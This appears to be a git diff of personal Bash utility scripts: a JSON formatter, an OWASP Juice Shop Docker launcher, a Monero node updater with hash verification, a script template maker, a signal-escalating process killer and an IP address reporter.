||||
509 Bandwidth Limit Exceeded
|
||||
510 Not Extended
|
||||
511 Network Authentication Required"
|
||||
|
||||
if [[ $# -eq 0 ]]; then
|
||||
echo "$statuses"
|
||||
else
|
||||
echo "$statuses" | grep -i --color=never "$@"
|
||||
fi
|
||||
219
scripts/jj
Executable file
219
scripts/jj
Executable file
|
|
@ -0,0 +1,219 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: jj
|
||||
# Description: JSON formatting and querying tool (upgrade from alias)
|
||||
# Usage: jj # Format clipboard JSON
|
||||
# jj '.users[0].name' # jq query on clipboard
|
||||
# jj -v # Validate JSON
|
||||
# jj -f file.json # Format file in place
|
||||
# jj -c # Compact JSON (remove whitespace)
|
||||
# cat file.json | jj # Format from stdin
|
||||
|
||||
VERSION="1.0.0"
|
||||
|
||||
show_help() {
|
||||
echo -e "\033[1mjj\033[0m - JSON Formatting & Querying Tool v${VERSION}"
|
||||
echo
|
||||
echo -e "\033[1mUSAGE:\033[0m"
|
||||
echo " jj [OPTIONS] [JQ_QUERY]"
|
||||
echo
|
||||
echo -e "\033[1mOPTIONS:\033[0m"
|
||||
echo -e " \033[0;36m-v, --validate\033[0m Validate JSON only (no output)"
|
||||
echo -e " \033[0;36m-f, --file\033[0m Format file in place"
|
||||
echo -e " \033[0;36m-c, --compact\033[0m Compact JSON (remove whitespace)"
|
||||
echo -e " \033[0;36m-i, --stdin\033[0m Read from stdin instead of clipboard"
|
||||
echo -e " \033[0;36m-o, --output\033[0m Write to clipboard (default: stdout)"
|
||||
echo -e " \033[0;36m-h, --help\033[0m Show this help message"
|
||||
echo
|
||||
echo -e "\033[1mEXAMPLES:\033[0m"
|
||||
echo " jj # Format clipboard JSON"
|
||||
echo " jj '.users[0].name' # Query clipboard with jq"
|
||||
echo " jj -v # Validate clipboard JSON"
|
||||
echo " jj -f data.json # Format file in place"
|
||||
echo " jj -c # Compact clipboard JSON"
|
||||
echo " cat file.json | jj # Format from stdin"
|
||||
echo " curl api.com | jj '.data' # Query API response"
|
||||
echo
|
||||
echo -e "\033[1mNOTE:\033[0m"
|
||||
echo " Requires jq to be installed for querying"
|
||||
}
|
||||
|
||||
# Clipboard functions
|
||||
clip_get() {
|
||||
if command -v xsel &>/dev/null; then
|
||||
xsel --output --clipboard
|
||||
elif command -v xclip &>/dev/null; then
|
||||
xclip -selection clipboard -o
|
||||
else
|
||||
echo "Error: No clipboard tool found" >&2
|
||||
return 1
|
||||
fi
|
||||
}
|
||||
|
||||
clip_set() {
|
||||
if command -v xsel &>/dev/null; then
|
||||
xsel --input --clipboard
|
||||
elif command -v xclip &>/dev/null; then
|
||||
xclip -selection clipboard
|
||||
else
|
||||
echo "Error: No clipboard tool found" >&2
|
||||
return 1
|
||||
fi
|
||||
}
|
||||
|
||||
# Get input (clipboard or stdin)
|
||||
get_input() {
|
||||
if [[ "${use_stdin}" == "true" ]] || [[ ! -t 0 ]]; then
|
||||
# Use stdin if explicitly requested OR if stdin is not a terminal (piped)
|
||||
cat
|
||||
else
|
||||
clip_get
|
||||
fi
|
||||
}
|
||||
|
||||
# Validate JSON
|
||||
validate_json() {
|
||||
local input=$1
|
||||
if echo "$input" | jq empty 2>/dev/null; then
|
||||
echo -e "\033[0;32m✓\033[0m Valid JSON"
|
||||
return 0
|
||||
else
|
||||
echo -e "\033[0;31m✗\033[0m Invalid JSON:" >&2
|
||||
echo "$input" | jq empty 2>&1 | sed 's/^/ /' >&2
|
||||
return 1
|
||||
fi
|
||||
}
|
||||
|
||||
# Format JSON (pretty print)
|
||||
format_json() {
|
||||
local input=$1
|
||||
echo "$input" | jq .
|
||||
}
|
||||
|
||||
# Compact JSON
|
||||
compact_json() {
|
||||
local input=$1
|
||||
echo "$input" | jq -c .
|
||||
}
|
||||
|
||||
# Query JSON with jq
|
||||
query_json() {
|
||||
local input=$1
|
||||
local query=$2
|
||||
echo "$input" | jq "$query"
|
||||
}
|
||||
|
||||
# Parse arguments
|
||||
mode="format"
|
||||
use_stdin=false
|
||||
to_clipboard=false
|
||||
file_path=""
|
||||
jq_query=""
|
||||
|
||||
while [[ $# -gt 0 ]]; do
|
||||
case $1 in
|
||||
-v|--validate)
|
||||
mode="validate"
|
||||
shift
|
||||
;;
|
||||
-f|--file)
|
||||
mode="file"
|
||||
file_path="$2"
|
||||
shift 2
|
||||
;;
|
||||
-c|--compact)
|
||||
mode="compact"
|
||||
shift
|
||||
;;
|
||||
-i|--stdin)
|
||||
use_stdin=true
|
||||
shift
|
||||
;;
|
||||
-o|--output)
|
||||
to_clipboard=true
|
||||
shift
|
||||
;;
|
||||
-h|--help)
|
||||
show_help
|
||||
exit 0
|
||||
;;
|
||||
*)
|
||||
# Assume it's a jq query
|
||||
jq_query="$1"
|
||||
mode="query"
|
||||
shift
|
||||
;;
|
||||
esac
|
||||
done
|
||||
|
||||
# Check if jq is installed
|
||||
if ! command -v jq &>/dev/null; then
|
||||
echo -e "\033[0;31mError:\033[0m jq is not installed" >&2
|
||||
echo "Install it with: sudo apt install jq" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Main logic
|
||||
case "$mode" in
|
||||
validate)
|
||||
input=$(get_input)
|
||||
validate_json "$input"
|
||||
;;
|
||||
|
||||
file)
|
||||
if [[ ! -f "$file_path" ]]; then
|
||||
echo -e "\033[0;31mError:\033[0m File not found: $file_path" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Validate first
|
||||
if ! jq empty "$file_path" 2>/dev/null; then
|
||||
echo -e "\033[0;31mError:\033[0m Invalid JSON in file" >&2
|
||||
jq empty "$file_path" 2>&1 | sed 's/^/ /' >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Format in place
|
||||
temp_file=$(mktemp)
|
||||
jq . "$file_path" > "$temp_file"
|
||||
mv "$temp_file" "$file_path"
|
||||
echo -e "\033[0;32m✓\033[0m Formatted: $file_path"
|
||||
;;
|
||||
|
||||
compact)
|
||||
input=$(get_input)
|
||||
output=$(compact_json "$input")
|
||||
|
||||
if [[ "$to_clipboard" == "true" ]]; then
|
||||
echo -n "$output" | clip_set
|
||||
echo -e "\033[0;32m✓\033[0m Copied compacted JSON to clipboard"
|
||||
else
|
||||
echo "$output"
|
||||
fi
|
||||
;;
|
||||
|
||||
query)
|
||||
input=$(get_input)
|
||||
output=$(query_json "$input" "$jq_query")
|
||||
|
||||
if [[ "$to_clipboard" == "true" ]]; then
|
||||
echo -n "$output" | clip_set
|
||||
echo -e "\033[0;32m✓\033[0m Copied query result to clipboard"
|
||||
else
|
||||
echo "$output"
|
||||
fi
|
||||
;;
|
||||
|
||||
format)
|
||||
input=$(get_input)
|
||||
output=$(format_json "$input")
|
||||
|
||||
if [[ "$to_clipboard" == "true" ]]; then
|
||||
echo -n "$output" | clip_set
|
||||
echo -e "\033[0;32m✓\033[0m Copied formatted JSON to clipboard"
|
||||
else
|
||||
echo "$output"
|
||||
fi
|
||||
;;
|
||||
esac
|
||||
172
scripts/jshop
Executable file
172
scripts/jshop
Executable file
|
|
@ -0,0 +1,172 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: jshop
|
||||
# Description: OWASP Juice Shop launcher
|
||||
# Usage: jshop start|stop|status|logs
|
||||
|
||||
VERSION="1.0.0"
|
||||
|
||||
# Colors
|
||||
readonly RED='\033[0;31m'
|
||||
readonly GREEN='\033[0;32m'
|
||||
readonly YELLOW='\033[1;33m'
|
||||
readonly CYAN='\033[0;36m'
|
||||
readonly BOLD='\033[1m'
|
||||
readonly NC='\033[0m'
|
||||
|
||||
CONTAINER_NAME="juice-shop"
|
||||
IMAGE="bkimminich/juice-shop"
|
||||
DEFAULT_PORT="3000"
|
||||
|
||||
# Find available port
|
||||
find_available_port() {
|
||||
local port="${1:-3000}"
|
||||
while lsof -Pi :$port -sTCP:LISTEN -t >/dev/null 2>&1 || sudo netstat -tuln | grep -q ":$port "; do
|
||||
echo -e "${YELLOW}⚠${NC} Port $port in use, trying next..." >&2
|
||||
port=$((port + 1))
|
||||
done
|
||||
echo "$port"
|
||||
}
|
||||
|
||||
show_help() {
|
||||
echo -e "${BOLD}jshop${NC} - OWASP Juice Shop Launcher v${VERSION}"
|
||||
echo
|
||||
echo -e "${BOLD}USAGE:${NC}"
|
||||
echo " jshop <command>"
|
||||
echo
|
||||
echo -e "${BOLD}COMMANDS:${NC}"
|
||||
echo -e " ${CYAN}start${NC} Start Juice Shop"
|
||||
echo -e " ${CYAN}stop${NC} Stop Juice Shop"
|
||||
echo -e " ${CYAN}restart${NC} Restart Juice Shop"
|
||||
echo -e " ${CYAN}status${NC} Check if running"
|
||||
echo -e " ${CYAN}logs${NC} Show container logs"
|
||||
echo -e " ${CYAN}shell${NC} Open shell in container"
|
||||
echo
|
||||
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||
echo " jshop start # Launch Juice Shop"
|
||||
echo " jshop stop # Stop Juice Shop"
|
||||
echo " jshop logs # View logs"
|
||||
echo
|
||||
echo -e "${BOLD}ACCESS:${NC}"
|
||||
echo " URL: ${BOLD}http://localhost:\$PORT${NC} (auto-detects available port)"
|
||||
echo
|
||||
echo -e "${BOLD}ABOUT:${NC}"
|
||||
echo " OWASP Juice Shop - Intentionally insecure web application"
|
||||
echo " Perfect for testing: XSS, SQLi, auth bypass, IDOR, etc."
|
||||
echo " Docs: https://pwning.owasp-juice.shop/"
|
||||
}
|
||||
|
||||
check_docker() {
|
||||
if ! command -v docker &>/dev/null; then
|
||||
echo -e "${RED}Error:${NC} Docker not installed"
|
||||
exit 1
|
||||
fi
|
||||
}
|
||||
|
||||
start_jshop() {
|
||||
# Find available port only when starting
|
||||
PORT=$(find_available_port "$DEFAULT_PORT")
|
||||
|
||||
if docker ps -a --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||
if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||
echo -e "${YELLOW}⚠${NC} Juice Shop already running"
|
||||
CURRENT_PORT=$(docker port "$CONTAINER_NAME" 3000 | cut -d: -f2)
|
||||
echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://localhost:${CURRENT_PORT}${NC}"
|
||||
return 0
|
||||
else
|
||||
echo -e "${CYAN}[*]${NC} Starting existing container..."
|
||||
docker start "$CONTAINER_NAME"
|
||||
fi
|
||||
else
|
||||
echo -e "${CYAN}[*]${NC} Pulling ${IMAGE}..."
|
||||
docker pull "$IMAGE"
|
||||
echo -e "${CYAN}[*]${NC} Starting Juice Shop..."
|
||||
docker run -d --name "$CONTAINER_NAME" -p "${PORT}:3000" "$IMAGE"
|
||||
fi
|
||||
|
||||
echo -e "${GREEN}✓${NC} Juice Shop started"
|
||||
if [[ "$PORT" != "$DEFAULT_PORT" ]]; then
|
||||
echo -e "${YELLOW}⚠${NC} Using port ${PORT} (default ${DEFAULT_PORT} was in use)"
|
||||
fi
|
||||
echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://localhost:${PORT}${NC}"
|
||||
}
|
||||
|
||||
stop_jshop() {
|
||||
if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||
echo -e "${CYAN}[*]${NC} Stopping Juice Shop..."
|
||||
docker stop "$CONTAINER_NAME"
|
||||
echo -e "${GREEN}✓${NC} Juice Shop stopped"
|
||||
else
|
||||
echo -e "${YELLOW}⚠${NC} Juice Shop not running"
|
||||
fi
|
||||
}
|
||||
|
||||
restart_jshop() {
|
||||
stop_jshop
|
||||
sleep 2
|
||||
start_jshop
|
||||
}
|
||||
|
||||
show_status() {
|
||||
if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||
echo -e "${GREEN}●${NC} Juice Shop is ${GREEN}running${NC}"
|
||||
CURRENT_PORT=$(docker port "$CONTAINER_NAME" 3000 2>/dev/null | cut -d: -f2)
|
||||
echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://localhost:${CURRENT_PORT}${NC}"
|
||||
docker ps --format "table {{.Names}}\t{{.Status}}\t{{.Ports}}" | grep -E "(NAMES|${CONTAINER_NAME})"
|
||||
else
|
||||
echo -e "${RED}●${NC} Juice Shop is ${RED}stopped${NC}"
|
||||
fi
|
||||
}
|
||||
|
||||
show_logs() {
|
||||
if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||
docker logs -f "$CONTAINER_NAME"
|
||||
else
|
||||
echo -e "${RED}Error:${NC} Juice Shop not running"
|
||||
exit 1
|
||||
fi
|
||||
}
|
||||
|
||||
open_shell() {
|
||||
if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||
docker exec -it "$CONTAINER_NAME" /bin/sh
|
||||
else
|
||||
echo -e "${RED}Error:${NC} Juice Shop not running"
|
||||
exit 1
|
||||
fi
|
||||
}
|
||||
|
||||
# Main
|
||||
check_docker
|
||||
|
||||
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
|
||||
show_help
|
||||
exit 0
|
||||
fi
|
||||
|
||||
case "$1" in
|
||||
start|up)
|
||||
start_jshop
|
||||
;;
|
||||
stop|down)
|
||||
stop_jshop
|
||||
;;
|
||||
restart)
|
||||
restart_jshop
|
||||
;;
|
||||
status)
|
||||
show_status
|
||||
;;
|
||||
logs)
|
||||
show_logs
|
||||
;;
|
||||
shell|sh|bash)
|
||||
open_shell
|
||||
;;
|
||||
*)
|
||||
echo -e "${RED}Error:${NC} Unknown command: $1"
|
||||
echo "Run 'jshop --help' for usage"
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
52
scripts/md_update.sh
Executable file
52
scripts/md_update.sh
Executable file
|
|
@ -0,0 +1,52 @@
|
|||
#!/bin/bash
|
||||
set -evo pipefail
|
||||
|
||||
echo "[*] Monero Updating"
|
||||
echo "[-] Removing old monero binaries..."
|
||||
rm -rf monero-*-linux-*
|
||||
|
||||
echo -e "[*] Checking architecture..."
|
||||
|
||||
if [[ $(arch) = "x86_64" ]]; then
|
||||
# Download latest 64-bit binaries
|
||||
echo "[*] Download latest Linux binaries..."
|
||||
wget -q --content-disposition https://downloads.getmonero.org/cli/linux64
|
||||
elif [[ $(arch) = "aarch64" || $(arch) = "aarm64" || $(arch) = "armv8" ]]; then
|
||||
# Download latest armv8 binaries
|
||||
echo "[*] Download latest Linux Arm8 binaries..."
|
||||
wget -q --content-disposition https://downloads.getmonero.org/cli/linuxarm8
|
||||
elif [[ $(arch) = "armv71" ]]; then
|
||||
# Download latest armv7 binaries
|
||||
echo "[*] Download latest Linux Arm7 binaries..."
|
||||
wget -q --content-disposition https://downloads.getmonero.org/cli/linuxarm7
|
||||
else
|
||||
echo -e "\e[31m[!] ERROR: Architecture not found. Please see https://www.getmonero.org/downloads/ to download manually.\e[0m"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Verify shasum of downloaded binaries
|
||||
echo "[*] Verifying hashes of downloaded binaries..."
|
||||
if shasum -a 256 -c hashes.txt -s --ignore-missing
|
||||
then
|
||||
echo
|
||||
echo "[~] Success: The downloaded binaries verified properly!"
|
||||
else
|
||||
echo
|
||||
echo -e "\e[31m[!] DANGER: The download binaries have been tampered with or corrupted.\e[0m"
|
||||
rm -rf monero-linux-*.tar.bz2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo "[~] Extracting new monero binaries..."
|
||||
tar xvf monero-linux-*.tar.bz2
|
||||
rm monero-linux-*.tar.bz2
|
||||
|
||||
echo "[-] Stopping monerod..."
|
||||
sudo systemctl stop monerod
|
||||
|
||||
echo "[~] Copying binaries to /usr/local/bin/"
|
||||
sudo cp -r monero-*-linux-*/* /usr/local/bin/
|
||||
sudo chown -R monero:monero /usr/local/bin/monero*
|
||||
|
||||
echo "[+] Starting monerod..."
|
||||
sudo systemctl start monerod
|
||||
24
scripts/mksh
Executable file
24
scripts/mksh
Executable file
|
|
@ -0,0 +1,24 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: mksh
|
||||
# Description: Rapidly create executable bash scripts with template
|
||||
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||
|
||||
if [[ $# -ne 1 ]]; then
|
||||
echo 'mksh takes one argument' >&2
|
||||
exit 1
|
||||
elif [[ -e "$1" ]]; then
|
||||
echo "$1 already exists" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
cat > "$1" << 'EOF'
|
||||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
EOF
|
||||
|
||||
chmod +x "$1"
|
||||
|
||||
"${EDITOR:-vim}" "$1"
|
||||
124
scripts/murder
Executable file
124
scripts/murder
Executable file
|
|
@ -0,0 +1,124 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: murder
|
||||
# Description: Gracefully terminate processes with escalating signals
|
||||
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||
# Credit: Evan Hahn - https://codeberg.org/EvanHahn/dotfiles
|
||||
# Usage: murder 1234 # kill PID
|
||||
# murder :8080 # kill process on port 8080
|
||||
# murder firefox # kill process by name
|
||||
# murder # interactive fzf picker (integrated with your k alias!)
|
||||
|
||||
# Signal escalation: [signal, wait_seconds]
|
||||
# SIGTERM (15) -> SIGINT (2) -> SIGHUP (1) -> SIGKILL (9)
|
||||
SIGNALS=("15 3" "2 3" "1 4" "9 0")
|
||||
|
||||
murder_pid() {
|
||||
local pid=$1
|
||||
|
||||
if ! ps -p "$pid" > /dev/null 2>&1; then
|
||||
echo "Process $pid not found" >&2
|
||||
return 1
|
||||
fi
|
||||
|
||||
local process_name=$(ps -p "$pid" -o comm= 2>/dev/null || echo "unknown")
|
||||
echo "Terminating $process_name (PID: $pid)..."
|
||||
|
||||
for sig_wait in "${SIGNALS[@]}"; do
|
||||
read -r sig wait <<< "$sig_wait"
|
||||
|
||||
if ! ps -p "$pid" > /dev/null 2>&1; then
|
||||
echo "✓ Process terminated successfully"
|
||||
return 0
|
||||
fi
|
||||
|
||||
case $sig in
|
||||
15) echo " → Sending SIGTERM (polite shutdown)..." ;;
|
||||
2) echo " → Sending SIGINT (interrupt)..." ;;
|
||||
1) echo " → Sending SIGHUP (hangup)..." ;;
|
||||
9) echo " → Sending SIGKILL (force kill)..." ;;
|
||||
esac
|
||||
|
||||
kill -"$sig" "$pid" 2>/dev/null || true
|
||||
|
||||
if [[ $wait -gt 0 ]]; then
|
||||
sleep "$wait"
|
||||
fi
|
||||
done
|
||||
|
||||
if ps -p "$pid" > /dev/null 2>&1; then
|
||||
echo "✗ Failed to terminate process" >&2
|
||||
return 1
|
||||
fi
|
||||
|
||||
echo "✓ Process terminated"
|
||||
}
|
||||
|
||||
# If no arguments, use fzf to select process (like your k alias!)
|
||||
if [[ $# -eq 0 ]]; then
|
||||
if ! command -v fzf &>/dev/null; then
|
||||
echo "Error: fzf not found. Install fzf or provide PID/name/port as argument." >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
selected=$(ps aux | fzf --header="Select process to terminate (graceful escalation)" \
|
||||
--header-lines=1 \
|
||||
--preview='echo "Will attempt: SIGTERM → SIGINT → SIGHUP → SIGKILL"')
|
||||
|
||||
if [[ -n "$selected" ]]; then
|
||||
pid=$(echo "$selected" | awk '{print $2}')
|
||||
murder_pid "$pid"
|
||||
fi
|
||||
exit 0
|
||||
fi
|
||||
|
||||
# Parse argument: PID, :port, or process name
|
||||
arg="$1"
|
||||
|
||||
if [[ "$arg" =~ ^[0-9]+$ ]]; then
|
||||
# Argument is a PID
|
||||
murder_pid "$arg"
|
||||
elif [[ "$arg" =~ ^:[0-9]+$ ]]; then
|
||||
# Argument is a port (e.g., :8080)
|
||||
port="${arg:1}"
|
||||
pid=$(lsof -ti ":$port" 2>/dev/null || true)
|
||||
|
||||
if [[ -z "$pid" ]]; then
|
||||
echo "No process found listening on port $port" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo "Found process on port $port:"
|
||||
ps -p "$pid" -o pid,comm,args | tail -1
|
||||
murder_pid "$pid"
|
||||
else
|
||||
# Argument is a process name
|
||||
pids=$(pgrep -f "$arg" || true)
|
||||
|
||||
if [[ -z "$pids" ]]; then
|
||||
echo "No processes found matching: $arg" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# If multiple processes, show list and let user choose
|
||||
count=$(echo "$pids" | wc -l)
|
||||
if [[ $count -gt 1 ]]; then
|
||||
echo "Multiple processes found matching '$arg':"
|
||||
ps -p $pids -o pid,comm,args
|
||||
|
||||
if command -v fzf &>/dev/null; then
|
||||
selected=$(ps -p $pids | fzf --header-lines=1)
|
||||
if [[ -n "$selected" ]]; then
|
||||
pid=$(echo "$selected" | awk '{print $1}')
|
||||
murder_pid "$pid"
|
||||
fi
|
||||
else
|
||||
echo -n "Enter PID to terminate: "
|
||||
read pid
|
||||
murder_pid "$pid"
|
||||
fi
|
||||
else
|
||||
murder_pid "$pids"
|
||||
fi
|
||||
fi
|
||||
248
scripts/myip
Executable file
248
scripts/myip
Executable file
|
|
@ -0,0 +1,248 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: myip
|
||||
# Description: Show external and internal IP addresses with optional features
|
||||
# Usage: myip # Show all IPs
|
||||
# myip -e # External IP only
|
||||
# myip -i # Internal IPs only
|
||||
# myip -c # Copy external IP to clipboard
|
||||
# myip -j # JSON output
|
||||
# myip -a # All info (IPs + gateway + DNS)
|
||||
|
||||
VERSION="1.0.0"
|
||||
|
||||
# Colors
|
||||
readonly RED='\033[0;31m'
|
||||
readonly GREEN='\033[0;32m'
|
||||
readonly YELLOW='\033[1;33m'
|
||||
readonly BLUE='\033[0;34m'
|
||||
readonly CYAN='\033[0;36m'
|
||||
readonly MAGENTA='\033[0;35m'
|
||||
readonly BOLD='\033[1m'
|
||||
readonly NC='\033[0m'
|
||||
|
||||
show_help() {
|
||||
echo -e "${BOLD}myip${NC} - IP Address Information Tool v${VERSION}"
|
||||
echo
|
||||
echo -e "${BOLD}USAGE:${NC}"
|
||||
echo " myip [OPTIONS]"
|
||||
echo
|
||||
echo -e "${BOLD}OPTIONS:${NC}"
|
||||
echo -e " ${CYAN}-e, --external${NC} Show external IP only"
|
||||
echo -e " ${CYAN}-i, --internal${NC} Show internal IPs only"
|
||||
echo -e " ${CYAN}-c, --copy${NC} Copy external IP to clipboard"
|
||||
echo -e " ${CYAN}-j, --json${NC} Output as JSON"
|
||||
echo -e " ${CYAN}-a, --all${NC} Show all network info (IPs + gateway + DNS)"
|
||||
echo -e " ${CYAN}-h, --help${NC} Show this help message"
|
||||
echo
|
||||
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||
echo " myip # Show both external and internal IPs"
|
||||
echo " myip -e # External IP only"
|
||||
echo " myip -c # Copy external IP to clipboard"
|
||||
echo " myip -j # JSON format for scripting"
|
||||
echo " myip -a # Complete network information"
|
||||
echo
|
||||
echo -e "${BOLD}OUTPUT:${NC}"
|
||||
echo " External IP, Internal IPs, Gateway (with -a), DNS servers (with -a)"
|
||||
}
|
||||
|
||||
# Get external IP with fallback sources
|
||||
get_external_ip() {
|
||||
local ip=""
|
||||
|
||||
# Try multiple sources for reliability
|
||||
sources=(
|
||||
"https://ifconfig.me"
|
||||
"https://api.ipify.org"
|
||||
"https://icanhazip.com"
|
||||
"https://checkip.amazonaws.com"
|
||||
)
|
||||
|
||||
for source in "${sources[@]}"; do
|
||||
ip=$(curl -sf --max-time 3 "$source" 2>/dev/null | tr -d '[:space:]')
|
||||
if [[ -n "$ip" ]] && [[ "$ip" =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
|
||||
echo "$ip"
|
||||
return 0
|
||||
fi
|
||||
done
|
||||
|
||||
echo "unable to fetch" >&2
|
||||
return 1
|
||||
}
|
||||
|
||||
# Get internal IPs
|
||||
get_internal_ips() {
|
||||
if command -v ip &>/dev/null; then
|
||||
# Modern Linux
|
||||
ip -4 addr show | grep -oP '(?<=inet\s)\d+(\.\d+){3}' | grep -v '127.0.0.1'
|
||||
elif command -v ifconfig &>/dev/null; then
|
||||
# macOS / older Linux
|
||||
ifconfig | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*' | grep -v '127.0.0.1'
|
||||
else
|
||||
echo "No network tools found" >&2
|
||||
return 1
|
||||
fi
|
||||
}
|
||||
|
||||
# Get internal IPs with interface names
|
||||
get_internal_ips_detailed() {
|
||||
if command -v ip &>/dev/null; then
|
||||
ip -4 addr show | awk '
|
||||
/^[0-9]+:/ { iface = $2; gsub(/:/, "", iface) }
|
||||
/inet / && !/127\.0\.0\.1/ {
|
||||
split($2, a, "/")
|
||||
print iface ":" a[1]
|
||||
}
|
||||
'
|
||||
elif command -v ifconfig &>/dev/null; then
|
||||
ifconfig | awk '
|
||||
/^[a-z]/ { iface = $1; gsub(/:/, "", iface) }
|
||||
/inet / && !/127\.0\.0\.1/ {
|
||||
for (i=1; i<=NF; i++) {
|
||||
if ($i == "inet") {
|
||||
print iface ":" $(i+1)
|
||||
break
|
||||
}
|
||||
}
|
||||
}
|
||||
'
|
||||
fi
|
||||
}
|
||||
|
||||
# Get default gateway
|
||||
get_gateway() {
|
||||
if command -v ip &>/dev/null; then
|
||||
ip route | grep default | awk '{print $3}' | head -1
|
||||
elif command -v route &>/dev/null; then
|
||||
route -n | grep '^0.0.0.0' | awk '{print $2}' | head -1
|
||||
elif command -v netstat &>/dev/null; then
|
||||
netstat -rn | grep default | awk '{print $2}' | head -1
|
||||
else
|
||||
echo "unknown"
|
||||
fi
|
||||
}
|
||||
|
||||
# Get DNS servers
|
||||
get_dns_servers() {
|
||||
if [[ -f /etc/resolv.conf ]]; then
|
||||
grep nameserver /etc/resolv.conf | awk '{print $2}' | tr '\n' ' '
|
||||
else
|
||||
echo "unknown"
|
||||
fi
|
||||
}
|
||||
|
||||
# JSON output
|
||||
json_output() {
|
||||
local external_ip=$(get_external_ip || echo "unknown")
|
||||
local internal_ips=$(get_internal_ips | tr '\n' ',' | sed 's/,$//')
|
||||
local gateway=$(get_gateway)
|
||||
local dns=$(get_dns_servers)
|
||||
|
||||
cat << EOF
|
||||
{
|
||||
"external_ip": "$external_ip",
|
||||
"internal_ips": [$( echo "$internal_ips" | sed 's/,/","/g; s/^/"/; s/$/"/' )],
|
||||
"gateway": "$gateway",
|
||||
"dns_servers": [$( echo "$dns" | sed 's/ /","/g; s/^/"/; s/$/"/' )]
|
||||
}
|
||||
EOF
|
||||
}
|
||||
|
||||
# Colorized output
|
||||
colorized_output() {
|
||||
local show_external=${1:-true}
|
||||
local show_internal=${2:-true}
|
||||
local show_all=${3:-false}
|
||||
|
||||
if [[ "$show_external" == "true" ]]; then
|
||||
echo -e "${BOLD}${CYAN}External IP:${NC}"
|
||||
external_ip=$(get_external_ip || echo "${RED}Unable to fetch${NC}")
|
||||
echo -e " ${GREEN}$external_ip${NC}"
|
||||
echo
|
||||
fi
|
||||
|
||||
if [[ "$show_internal" == "true" ]]; then
|
||||
echo -e "${BOLD}${CYAN}Internal IPs:${NC}"
|
||||
while IFS=: read -r iface ip; do
|
||||
echo -e " ${YELLOW}$iface${NC}: ${GREEN}$ip${NC}"
|
||||
done < <(get_internal_ips_detailed)
|
||||
echo
|
||||
fi
|
||||
|
||||
if [[ "$show_all" == "true" ]]; then
|
||||
echo -e "${BOLD}${CYAN}Gateway:${NC}"
|
||||
echo -e " ${GREEN}$(get_gateway)${NC}"
|
||||
echo
|
||||
|
||||
echo -e "${BOLD}${CYAN}DNS Servers:${NC}"
|
||||
for dns in $(get_dns_servers); do
|
||||
echo -e " ${GREEN}$dns${NC}"
|
||||
done
|
||||
echo
|
||||
fi
|
||||
}
|
||||
|
||||
# Parse arguments
|
||||
mode="default"
|
||||
show_external=true
|
||||
show_internal=true
|
||||
show_all=false
|
||||
copy_to_clipboard=false
|
||||
json_format=false
|
||||
|
||||
while [[ $# -gt 0 ]]; do
|
||||
case $1 in
|
||||
-e|--external)
|
||||
show_external=true
|
||||
show_internal=false
|
||||
shift
|
||||
;;
|
||||
-i|--internal)
|
||||
show_external=false
|
||||
show_internal=true
|
||||
shift
|
||||
;;
|
||||
-c|--copy)
|
||||
copy_to_clipboard=true
|
||||
shift
|
||||
;;
|
||||
-j|--json)
|
||||
json_format=true
|
||||
shift
|
||||
;;
|
||||
-a|--all)
|
||||
show_all=true
|
||||
shift
|
||||
;;
|
||||
-h|--help)
|
||||
show_help
|
||||
exit 0
|
||||
;;
|
||||
*)
|
||||
echo "${RED}Error: Unknown option: $1${NC}" >&2
|
||||
echo "Run 'myip --help' for usage information" >&2
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
done
|
||||
|
||||
# Clipboard helper
|
||||
clip_set() {
|
||||
if command -v xsel &>/dev/null; then
|
||||
xsel --input --clipboard
|
||||
elif command -v xclip &>/dev/null; then
|
||||
xclip -selection clipboard
|
||||
fi
|
||||
}
|
||||
|
||||
# Main logic
|
||||
if [[ "$json_format" == "true" ]]; then
|
||||
json_output
|
||||
elif [[ "$copy_to_clipboard" == "true" ]]; then
|
||||
external_ip=$(get_external_ip)
|
||||
echo -n "$external_ip" | clip_set
|
||||
echo -e "${GREEN}✓${NC} Copied to clipboard: ${BOLD}$external_ip${NC}"
|
||||
else
|
||||
colorized_output "$show_external" "$show_internal" "$show_all"
|
||||
fi
|
||||
43
scripts/nato
Executable file
43
scripts/nato
Executable file
|
|
@ -0,0 +1,43 @@
|
|||
